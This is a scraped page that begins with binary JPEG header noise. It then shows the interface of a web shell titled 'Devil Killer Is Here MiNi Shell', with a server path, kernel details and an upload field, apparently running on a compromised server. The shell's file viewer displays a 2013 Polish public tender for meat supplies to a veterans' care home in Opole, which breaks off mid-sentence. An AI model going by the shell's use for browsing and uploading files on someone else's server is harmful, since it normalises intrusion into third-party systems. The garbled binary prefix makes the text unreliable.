JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130121/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130121/28858-N-2013.html

<p class="kh_header"><b>Opole: Sukcesywna dostawa mięsa wieprzowego, wołowego , drobiowego                         i przetworów mięsnych, oraz podrobów   do Domu Pomocy Społecznej dla Kombatantów  ul. Chmielowicka 6, 45-738 Opole</b><br>
<b>Numer ogłoszenia: 28858 - 2013; data zamieszczenia: 21.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej dla Kombatantów w Opolu , ul. Chmielowicka 6, 45-738 Opole, woj. opolskie, tel. 0-77 4743697, 457 54 95, faks 0-77 4743697, 457 54 95.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dps.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa mięsa wieprzowego, wołowego , drobiowego                         i przetworów mięsnych, oraz podrobów   do Domu Pomocy Społecznej dla Kombatantów  ul. Chmielowicka 6, 45-738 Opole.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa mięsa wieprzowego, wołowego , drobiowego i   przetworów mięsnych, oraz podrobów   do Domu Pomocy Społecznej dla Kombatantów  ul. Chmielowicka 6, 45-738 Opole, w ilości i asortymencie wyszczególnionym  w niniejszej specyfikacji istotnych warunków zamówienia w pkt. 2 od poz 1 do poz. 55: 
tj. 
poz1. Mięso wołowe gulaszowe b.k ekstra kl.1 - chude mięso bez ścięgien łoju i skóry grubo rozdrobniony. 	                    PN-A-82011,  ilość  530kg;
poz.2. Mięso wieprzowe gulaszowe b.k kl.1 (wg standardów UE)bez ścięgien i łoju grubo rozdrobniony PN-A-82002, ilość 	940 kg; 
poz.3. Schab b/kości bez łoju klasa I PN-86-A-82002, ilość  300kg; 
poz.4. Łopatka wieprzowa bez kości PN-86-A82002 mięso bez fałd skóry i bez tłuszczu pachowego i tłuszczu śródmięśniowego całkowicie odkostnione, odtłuszczone, pozbawione ścięgien	,   ilość 	340 kg 
poz.5. Karczek wieprzowy bez kości PN-86-A-82002, całkowicie odkostniona, słonina całkowicie zdjęta                             ilość   290 kg;
poz.6. Wołowina zrazowa PN-88-A-82003, mięso extra bez kości uzyskane z części ćwierćtuszy tylnej z części wewnętrznej udźca po ściągnięciu tłuszczu i błony ścięgnistych mięśni,  ilość 	600 kg;
poz.7. Kości wieprzowe grube tutkowe, 	ilość 1350 kg;
poz.8. Ćwiartka tylna kurczaka PN-92A-86524 (pałka+udziec + część korpusu ) waga jednostkowa  nie może przekraczać 300-350g.	ilość 850 kg;
poz.9. Udko z kurczaka (udziec+pałka) PN-92A-86524 waga jednostkowa ok 250g- element tuszki kurczęcej obejmuje kość udową, piszczelową i strzałkową, łącznie z otaczającymi je mięśniami. Uda właściwie umięśnione, linia cięta równa, nie dopuszcza się wylewów krwawych w mięśniach ,    ilość  120 kg;
poz.10. Korpus z kurczaka  PN92A-86524, element uzyskany z rozbioru tuszki kurczaka bez przebarwień i uszkodzeń mechanicznych oraz bez zanieczyszczeń obcych,  ilość 	440 kg;
poz.11.  Filet z piersi kurczaka PN-92A-86524- element tuszki kurczęcej obejmującej mięsień piersiowo powierzchniowy bez przylegającej skóry i b/kości, 	ilość   420 kg;
poz.12. Gulaszowe z indyka PN-92A-86522 mięśnie piersi pozbawione skóry, kości i ścięgien, prawidłowo wykrwawione bez przebarwień i uszkodzeń mechanicznych oraz bez zanieczyszczeń obcych.                               ilość  260 kg ; 
poz.13. Filet z indyka PN-92A/86522 , mięśnie piersiowe pozbawione  skóry,  kości i ścięgien, prawidłowo wykrwawione, bez przebarwień i uszkodzeń mechanicznych oraz bez zanieczyszczeń obcych                                   ilość 60 kg; 
poz.14. Boczek świeży- surowy łuskany bez skóry i bez kości  PN-A-82007;1996 nie mrożony spełniający wymagania normy,    ilość 30 kg 
poz.15. Słonina bez skóry świeża surowa PN-86A-82002 nie mrożona, słonina podskórna tkanka tłuszczowa zdjęta z grzbietu tylnej części tułowia( w tym z szynki) i boków świni( w tym łopatki) bez skóry w formie płatów.                    Płat słoniny nie mniej niż 0,50kg.   ilość 240 kg; 
poz.16. Wątróbka drobiowa PN-92A-86521-wątroba z kurczaka uzyskana z tuszki kurczęcej w postaci podwójnych lub pojedynczych płatów i pozbawiona części niejadalnych- bez woreczka żółciowego i zanieczyszczeń, dopuszcza się pojedyncze części płatów o wielkości mniejszej niż połowa płata, barwa beżowa do brunatno- wiśniowej charakterystyczna dla wątroby świeżej,     ilość 	185 kg; 
poz.17. Żołądki z kurcząt świeże PN-92A-86521 z usuniętą treścią, oraz warstwą zrogowaciałą z odciętym tuż przy mięśniu żołądkiem gruczołowym i dwunastnicą nadmiar tłuszczu usunięty, dopuszcza się niewielkie uszkodzenia mięśnia, oraz pozostałości tkanki łącznej, barwa jasnoczerwona do ciemnoczerwonej, niedopuszczalna zielonkawa barwa,    ilość 	60 kg;
poz.18. Boczek wędzony wieprzowy bez kości   PN-A82007;1996-łuskany parzony, bez widocznych złogów solanki skład: surowe mięso wędzone 80-92% parzone spełniające normę tłuszczu dla boczku bez żeberek. Boczek wędzony bez żeberek- wędzonka z boczku wieprzowego ze skórą. Wybór peklowany, wędzony, chłodzony powietrzem. Tłuszcz przerośnięty warstwami mięsa produkt dość soczysty. Niedopuszczalne szarozielone plamy świadczące o niedopeklowaniu i żółta barwa tłuszczu. Smak w miarę słony. Wędzenie wyczuwalne. ilość 275  kg;
poz.19. Baleron gotowany- wieprzowy PN-A-82007:1996- wędzonka parzona wysokowydajna. Skład: mięso wieprzowe70-75%- kształt nieforemnego walca uzależniony od mięśnia powierzchnia czysta, lekko wilgotna, długość do 30cm i przekroju do 12cm. Wygląd na przekroju -struktura plastra o grubości 3mm, dość ścisła, dopuszcza  się nieznaczne rozdzielenie plastra w miejscach łączenia mięśni: konsystencja soczysta, krucha, powierzchnia przekroju lekko wilgotna,  nie dopuszcza  się skupiska galarety na przekroju oraz wyciek soku. Konsystencja ścisła, plaster 3mm nie powinien się rozpadać,  ilość  180 kg ;
poz.20. Szynka konserwowa wieprzowa PN-A-82007;1996. Nadziewana w osłonkę sztuczną o średnicy 9,5cm, formowana w kształcie bloku, długość bloku 25-30cm. Wybór parzony, chłodzony, dochładzany powietrzem, Powierzchnia sucha, gładka, czysta folia ściśle przylegająca do mięsa, na przekroju widoczne kawałki mięsa, konsystencja soczysta krucha, plasterki grubości 2mm nie powinny się rozpadać w skład której wchodzi mięso wieprzowe kl I.  Pochodzące tylko z trybowania szynek, skład mięso wieprzowe z szynki 87-90%, zawartość białka nie mniej niż 20% z mięsa peklowanego rozdrobniona, parzona, soczysta, ścisła, powierzchnia przekroju lekko wilgotna, niedopuszczalny wyciek soku oraz skupiska galarety.     ilość	230 kg;
poz.21. Polędwica sopocka wieprzowa- PN-A-82007:1996, wyrób wędzony o zachowanej strukturze tkankowej, parzony bez skóry i słoniny, skład: mięso wieprzowe schab-86-96%. Wędzonka wieprzowa cało mięśniowa, otrzymana ze schabu obrobionego, wyprodukowana z jednej części anatomicznej tuszy schabu bez kości, peklowana wędzona, parzona. Powierzchnia sucha czysta widoczne lekkie pofałdowanie powierzchni. Struktura odpowiadająca układowi anatomicznemu schabu. Plasterki o grubości 2mm nie powinny się rozpadać. Zawartość białka nie mniej niż18% tłuszczu nie więcej niż 8% ,  ilość   65  kg;
poz.22. Schab wędzony PN-A-82007;1996- skład mięso wieprzowe 95-100% bez słoniny mocno wędzony i parzony bez kości.,  ilość    50 kg ; 
poz.23. Szynka wieprzowa gotowana PN-A-82007;1996- skład mięso wieprzowe 79-80% bez słoniny mocno wędzona i parzona,   ilość 110 kg 
poz.24. Szynka wieprzowa wiejska PN-A-820035:2005-  skład mięso szynki wieprzowej 70-75% z cienką warstwą tłuszczu wędzony i parzony ,  ilość   145 kg; 
poz.25. Wędzona ogonówka PN-A 82007, wyrób z mięsa wieprzowego peklowany, wędzony, parzony bez tłuszczu o zachowanej strukturze tkankowej, wyprodukowany z jednej części anatomicznej tuszy- szynka bez kości- skład mięso wieprzowe od szynki 92-95% kształt uzależniony od wielkości i sposobu uformowania surowca- kształt nieforemnego walca, dopuszczalna warstwa tłuszczu zewnętrznego do 5mm. Plasterki grubości 3mm nie powinny się rozpadać	,  ilość  	110  kg;
poz.26. Wędzonka wieprzowa PN-A 82007, wyrób z polędwicy wieprzowej wędzony parzony peklowany, bez skóry i słoniny, skład: polędwica wieprzowa 84-89%, ilość 	100 kg; 
poz.27. Wędzonka wieprzowa z mięsa od szynki- poddana wędzeniu, parzeniu z zawartością tłuszcz5%,                                       ilość 75 kg;
poz.28. Wędzona łopatka bez kości PN-A-82007 wyrób z łopatki wieprzowej poddany wędzeniu i parzeniu,                           ilość  250 kg; 
poz.29. Wędzonka duńska z mięsa wieprzowego peklowana, poddana wędzeniu i parzeniu bez słoniny. Skład: mięso wieprzowe 95-100% np. w bloku do porcjowania w plasterki,   ilość   60 kg;
poz.30. Rolada boczkowa- wyrób z boczku chudego łuskanego zrolowanego peklowanego poddany wędzeniu i parzony- wędzonka wysokowydajna, skład boczek wędzony  92-94%	,   ilość  70  kg;
poz.31. Mielonka tyrolska PN-A 82007:1996, parzona, w osłonce  poliamidowej, wyprodukowana z mięsa średnio rozdrobnionego, wieprzowego, peklowanego z dodatkiem składników zwiększających wodochłonność. Nadziewana w osłonkę sztuczną o średnicy 9,5cm formowany w kształt bloku o długości bloku 25-30cm. Wyrób parzony, chłodzony, dochładzany powietrzem. Zawartość białka nie mniej niż 10%, tłuszczu nie więcej niż 30%. Powierzchnia sucha, gładka, czysta, folia ściśle przylegająca do mięsa. Na przekroju widoczne duże kawałki mięsa, konsystencja soczysta, krucha, plasterki 2mm nie powinny się rozpadać. Charakterystyczny dla asortymentu wyczuwalny smak i zapach ,   ilość 110 kg;
poz.32. Cielęcina pieczona wyrób z cielęciny pieczony domowy wyśmienity produkt na bazie cielęciny w cienkiej otoczce tłuszczu,  ilość  70 kg;
poz.33. Pieczeń rzymska PN-A-82007;1996 wyrób wieprzowy, średnie rozdrobnienie składników, dość ścisłą, nierozpadająca się barwa- charakterystyczna dla danego asortymentu, w przekroju jasnoróżowa.   Skład mięso wieprzowe38-40% ,   ilość 120 kg; 
poz.34. Filet z indyka wędzony -wyrób z piersi indyczej peklowany poddany wędzeniu i parzeniu PN-A-86526                    ilość  42 kg;
poz.35. Szynka drobiowa PN-A-86526 skład mięso z indyka43-48%, wyrób otrzymany z całej lub grubo rozdrobnionych peklowanych mięśni piersiowych drobiowych, wędzony, parzony, produkt w sztucznej osłonce, w formie batonu o średnicy od 10 do 13cm i długości od 50 do 60 cm. Zawartość białka, nie mniej niż 18% Pn=a 04018, zawartość tłuszczu nie więcej niż 10% PN-ISO1444. Zawartość tłuszczu nie więcej niż 10%,  ilość   80 kg;
poz.36. Szynka z indyka PN-A/82062 skład: pierś indycza kl I    85-87% a  mięso z indyka 5-8%                                          ilość  50 kg;
poz.37. Szynka drobiowa wyprodukowana z z peklowanych lub nie peklowanych surowców drobiowych średnio lub grubo rozdrobnionych, z dodatkiem przypraw, wędzona poddana obróbce cieplnej, blok lub gruba wędlina do porcjowania w plasterki,   ilość  60  kg;
poz.38. Polędwica drobiowa- wędzona lekko rozdrobniona, parzona w osłonce barierowej.  Skład: mięso z piersi kurcząt 84-86%,    ilość 60 kg; 
poz.39. Kiełbasa Leśna, PN-82007;1996 średnio rozdrobniona wieprzowa, wędzona parzona, w osłonce naturalnej- kiełbaśnicy, zawartość białka nie mniej niż 10% nie więcej niż 25%, ilość  140  kg;
poz.40. Kiełbasa śląska kalibrowana około 100g PN-A-82007, skład : mięso wieprzowe 65-70% tłuszczu wieprzowy 5-8% wyprodukowany z mięsa peklowanego wieprzowego średnio rozdrobnionego, nadziewana w jelita wieprzowe naturalne o średnicy 2-2,5cm, długości 8-10cm. Kiełbasa wędzona parzona a następnie studzona wodą i dochładzana powietrzem. Osłonka ściśle przylegająca do farszu surowe mięso rozdrobnione równomiernie rozmieszczone na przekroju niedopuszczalne skupiska jednego ze składników. Charakterystyczny dla asortymentu, wyczuwalny smak i zapach użytych przypraw. Zawartość białka nie mniej niż 16%,  ilość   410   kg;
poz.41. Kiełbasa zwyczajna extra PN-A-82007 wyprodukowany z peklowanego mięsa wieprzowego średnio rozdrobnionego nadziewana w jelita wieprzowe naturalne o średnicy 2,8-3cm, długości od10 do 14cm. Kiełbasa wędzona, parzona. Charakterystyczny dla asortymentu smak i zapach dla używanych przypraw                     ilość  240  kg;
poz.42. Kiełbasa śląska drobiowa PN-A86526;1996, średnio rozdrobniona, kalibrowana około 100g, czysto drobiowa w osłonce białkowej, wędzona, parzona, zawartość białka nie mniej niż 16% tłuszczu nie więcej niż 10%                    ilość  90 kg;
poz.43. Kiełbasa biała parzona- PN-A-82007;1996z średnio rozdrobnionego  mięsa wieprzowego (90%)- wołowa(10%), niewędzona, parzona w naturalnych osłonkach wieprzowych,  ilość 115 kg;
poz.44.  Kiełbasa PN-A-82007;1996, średnio rozdrobniona wieprzowo - wołowa, wędzona parzona, w osłonce naturalnej- kiełbaśnicy, mocno wędzona zawartość białka nie mniej niż 10%, tłuszczu nie więcej niż 25%, kalibrowana po 100g długość 8-10cm typu  swojska,  ilość 100 kg; 
poz.45. Kiełbasa krakowska PN-A-82007;1996, grubo rozdrobniona wyprodukowana z peklowanego mięso wieprzowego nadziewana w osłonki sztuczne, białkowe o średnicy 8cm, długość batonu od 25 do 35cm. Kiełbasa wędzona, parzona, chłodzona. Surowce mięsne rozdrobnione, równomiernie rozmieszczone na przekroju. Plasterki o grubości 2mm nie powinny się rozpadać. Barwa na przekroju różowa,                            ilość   220 kg; 
poz.46. Kiełbasa szynkowa wieprzowa PN-A-2007;1996, kiełbasa grubo rozdrobniona, czysto wieprzowa w osłonce białkowej, wędzona, parzona o zawartości białka nie nie mniejszej niż 16% i tłuszczu nie więcej niż 25%, baton o długości od 35 cm d 40 cm i średnicy 0d9-10cm. Konsystencja ścisła, plastry grubości 3mm nie powinny się rozpadać,  .ilość   125  kg; 
poz.47. Kiełbasa żywiecka PN-A-82028- kiełbasa grubo rozdrobniona, wyprodukowana z mięsa wieprzowego, peklowanego, nadziewana w osłonki sztuczne, białkowe. Długość batonu ok 30cm. Kiełbasa wędzona parzona, chłodzona powietrzem, podsuszana. Konsystencja dość ścisła, elastyczna, związanie dobre, plasterki o grubości 2mm nie powinny się rozpadać,  ilość    220 kg;
poz.48. Kiełbasa dębicka   PN-A-82007 Kiełbasa drobiowo- wieprzowa  z dodatkiem naturalnych przypraw poddana wędzeniu i parzeniu w osłonce celulozowej. Skład: mięso wieprzowe klasy  I ,II  (50-60%) mięso drobiowe(30-40%),   ilość  170 kg;
poz.49. Parówka gruba PN-A-82007;1996, drobno rozdrobniona czysto wieprzowa, wędzona, parzona, zawartość białka nie mniej niż 10% tłuszczu nie więcej niż 35% , ilość   280 kg;
poz.50. Parówki cienkie PN-A-82007;1996, Drobno rozdrobnione homogenizowane- kiełbaski wieprzowo -wołowe z mięsa peklowanego, wędzone parzone w osłonce wiskozowej o długości 1,8-2,2cm długości 10-12 cm                         ilość  	160 kg;
poz.51. Parówki cielęce PN-A-82007;1996, drobno rozdrobnione homogenizowana czysto cielęca, luksusowa, wędzona parzona, surowce rozdrobnione i kutrowane z dodatkiem gotowej mieszanki przyprawowej. Farsz nadziewany w osłonkę sztuczną,  ilość 150   kg; 
poz.52. Salceson gotowany czysto wieprzowy PN-A-82007;1996 w osłonkach z tworzywa sztucznego, zawartość tłuszczy nie więcej niż 35,5%. Wyrób wyprodukowany z peklowanego mięsa wieprzowego, mięsa głów z dodatkiem żelatyny wieprzowej,   ilość 70   kg; 
poz.53. Salceson gotowany czysto  drobiowy w osłonkach poliamidowych, wyrób wyprodukowany z peklowanego mięsa drobiowego, z dodatkiem żelatyny wieprzowej, nadziewany  w osłonki sztuczne,                                 ilość  85  kg; 
poz.54. Kaszanka PN-A-82007;1996, Kaszanka średnio rozdrobniona w naturalnej osłonie- wędlina podrobowa z mięsa wieprzowego, kaszy gruboziarnistej, podrobów i krwi wieprzowej oraz naturalnych przypraw                          ilość  170  kg; 
poz.55. Pasztet zapiekany wieprzowo -drobiowy PN-A-82007;1996 wyprodukowany z mięsa i tłuszczu wieprzowego 25-40% z dodatkiem wątroby wieprzowej, mięsa indyczego23-25%, wątroby indyczej12-15%, surowce dokładnie rozdrobnione, konsystencja smarowana. Zawartość tłuszczu nie więcej niż 40%,  ilość  	95 kg; Zamawiający wymaga aby dostawy mięsa wołowego i wieprzowego, przetworów mięsnych, oraz mięsa drobiowego następowała do jego siedziby trzy razy w tygodniu (wtorek, czwartek, piątek) w godzinach od 7 ;00 do 10:00.
Zamawiający wymaga, aby cały  dostarczany asortyment przedmiotu zamówienia obowiązkowo  posiadał  Handlowy dokument identyfikacyjny zgodnie z ustawą o produktach pochodzenia zwierzęcego ( Dz. U. z 2006 r nr 17, poz. 127), oraz rozporządzeniem WE 853/2004 Parlamentu Europejskiego i Rady z 29 kwietnia 2004 r, ustanawiającego szczególne przepisy dotyczące higieny w odniesieniu do żywności pochodzenia zwierzęcego (Dz.Urz.UE.L139 z 30 kwietnia 2004 r) ponadto produkty przetworzone spełniały normy związane ze Zintegrowanym Systemem Zarządzania HACCP.

Przedmiot zamówienia będzie zamawiany partiami, które w treści umowy określane są jako jednorazowe zamówienie, w zależności od aktualnych potrzeb zamawiającego.
Wielkość jednorazowego zamówienia zostanie każdorazowo uzgodniona telefoniczne lub poprzez pisemne zgłoszenie w terminie do 2 dni przed odbiorem licząc od chwili zgłoszenia faksem  od zamawiającego lub według ustalonego harmonogramu, a w sytuacjach szczególnych, na żądanie zamawiającego, także poza tymi dniami.


Zamawiający zastrzega, że wielkość przedmiotu zamówienia oraz wartość umowy może ulec
zmniejszeniu , stosownie do faktycznych wielkości dostaw, przy zachowaniu cen podanych w ofercie.

Wykonawca zamówiony towar będzie dostarczał do siedziby Zamawiającego własnym transportem zgodnie z wymogami określonymi w Ustawie z dnia 25.08.2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006 r. nr 171 poz. 1225) wraz z odpowiednimi aktami wykonawczymi. 
Warunki transportu muszą być zgodne z zasadami GMP-GHP ( GMP jest Dobra Praktyka Produkcyjna obejmująca działania mające na celu, aby produkcja żywności, oraz wyrobów przeznaczonych do kontaktu z żywnością odbywała się w sposób zapewniający bezpieczeństwo żywności, zgodnie z przeznaczeniem; GHP- dobra praktyka Higieniczna obejmuje działania związane z warunkami i środkami podejmowanymi celem zapewnienia produkcji bezpiecznej żywności na wszystkich etapach produkcji). Dostawy mięsa powinny odbywać się w zamkniętych opakowaniach lub pojemnikach plastikowych z pokrywami, posiadających stosowne atesty, pojemnikach plombowanych lub metkowanych, czystych, nieuszkodzonych.

W przypadku niezgodności dostawy z zamówieniem, zamawiający ma prawo zgłoszenia
reklamacji telefonicznie, a wykonawca zobowiązany jest do natychmiastowej jej wymiany na towar o cechach organoleptycznych poszczególnych asortymentów  zgodnie z ustawą z 25 sierpnia 2006 r o bezpieczeństwie żywności i żywienia.
Przez cechy organoleptyczne przedmiotu zamówienia rozumie się zespół cech obejmujących smak, zapach, wygląd, w tym barwę i konsystencję środków spożywczych, które można wyodrębnić i ocenić za pomocą zmysłów człowieka.												
Zamawiający zastrzega, że wielkość przedmiotu zamówienia oraz wartość umowy może ulec zmniejszeniu, stosownie do faktycznych wielkości dostaw, przy zachowaniu cen podanych w ofercie  bez prawa roszczeń z tego tytułu przez Wykonawcę. 
Zamawiający w trakcie realizacji umowy może dokonać  drobnych przesunięć   asortymentu , według bieżących potrzeb i celowości zakupu, przy czym ogólna wartość przedmiotu zamówienia nie przekroczy kwoty zapisanej w umowie. Wykonawca będzie realizował dostawy (zamówienie) po  stałych cenach jednostkowych zawartych w ofercie. Zamawiający  dopuszcza w sytuacji zmiany wielkości opakowania przez producenta  możliwość przeliczenia ceny jednostkowej   na jednostkę  miary..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.11.00-0, 15.11.20.00-6, 15.11.23.00-9, 15.11.30.00-3, 15.11.40.00-0, 15.13.00.00-8, 15.13.11.20-2, 15.13.11.30-5, 15.13.11.35-0, 15.13.12.10-0, 15.13.14.00-9, 15.13.16.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przez wykonawców warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez wykonawcę oświadczenia i dokumenty potwierdzające:
	*Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy 	prawa nakładają obowiązek ich posiadania:
													
	W celu wykazania  braku podstaw do wykluczenia z postępowania o udzielenie zamówienia 	publicznego Wykonawcy w okolicznościach o których mowa w art. 22 ust.1 pkt 1 ustawy 	Pzp. Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z 	postępowania, zgodnie z  wzorem ( propozycją) oświadczenia stanowiącym załącznik do 	 specyfikacji Istotnych Warunków Zamówienia ( SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przez wykonawców warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez wykonawcę oświadczenia i dokumenty potwierdzające:posiadanie wiedzy i doświadczenia.  								Wykonawcy składając ofertę muszą spełnić ( w przypadku wspólnego ubiegania się o 	udzielenie zamówienia przez dwóch  lub więcej Wykonawców o udzielenie niniejszego 	zamówienia, oceniane będzie ich łączna wiedza i doświadczenie) warunek  posiadania 	wiedzy i doświadczenia, polegający  na wykazaniu się w okresie ostatnich trzech  lat przed 	upływem terminu składania ofert a jeśli okres prowadzenia działalności jest krótszy- w tym 	okresie, należycie wykonanymi  minimum jednej  dostawy ( dostawa realizowana na 	podstawie jednej umowy) odpowiadających swoim rodzajem dostawom stanowiącym 	przedmiot zamówienia, tj. sukcesywna dostawa mięsa 